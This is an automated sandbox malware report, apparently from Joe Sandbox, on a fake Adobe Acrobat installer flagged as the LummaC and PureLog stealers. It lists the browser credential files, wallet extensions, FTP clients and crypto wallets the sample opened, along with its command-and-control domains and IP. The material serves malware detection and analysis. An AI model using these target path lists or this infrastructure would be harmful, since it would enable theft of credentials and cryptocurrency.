Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Adobe-Acrobat-Pro-2025.exe PID: 2316, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Adobe-Acrobat-Pro-2025.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Adobe-Acrobat-Pro-2025.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Adobe-Acrobat-Pro-2025.exe.3539550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Adobe-Acrobat-Pro-2025.exe.3539550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2170361115.0000000000012000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	23 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Adobe-Acrobat-Pro-2025.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.LummaStealer
Adobe-Acrobat-Pro-2025.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
jarry-fixxer.bond	0%	Avira URL Cloud	safe
immolatechallen.bond	0%	Avira URL Cloud	safe
sobrattyeu.bond	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/apir	0%	Avira URL Cloud	safe
stripedre-lot.bond	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/pit(	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/$I	0%	Avira URL Cloud	safe
jarry-deatile.bond	0%	Avira URL Cloud	safe
pain-temper.bond	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/432T)	0%	Avira URL Cloud	safe
crookedfoshe.bond	0%	Avira URL Cloud	safe
growthselec.bond	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/api	0%	Avira URL Cloud	safe
strivehelpeu.bond	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sobrattyeu.bond	104.21.80.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
jarry-deatile.bond	true	Avira URL Cloud: safe	unknown
immolatechallen.bond	true	Avira URL Cloud: safe	unknown
stripedre-lot.bond	true	Avira URL Cloud: safe	unknown
jarry-fixxer.bond	true	Avira URL Cloud: safe	unknown
sobrattyeu.bond	true	Avira URL Cloud: safe	unknown
pain-temper.bond	true	Avira URL Cloud: safe	unknown
crookedfoshe.bond	true	Avira URL Cloud: safe	unknown
growthselec.bond	true	Avira URL Cloud: safe	unknown
https://sobrattyeu.bond/api	true	Avira URL Cloud: safe	unknown
strivehelpeu.bond	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://sobrattyeu.bond/apir	Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418794344.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sobrattyeu.bond/	Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418506061.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sobrattyeu.bond/pit(	Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418794344.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sobrattyeu.bond/$I	Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418506061.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sobrattyeu.bond/432T)	Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418794344.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.5.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.80.1	sobrattyeu.bond	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591985
Start date and time:	2025-01-15 16:13:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Adobe-Acrobat-Pro-2025.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 45 Number of non-executed functions: 100
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.189.173.22, 20.190.159.4, 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
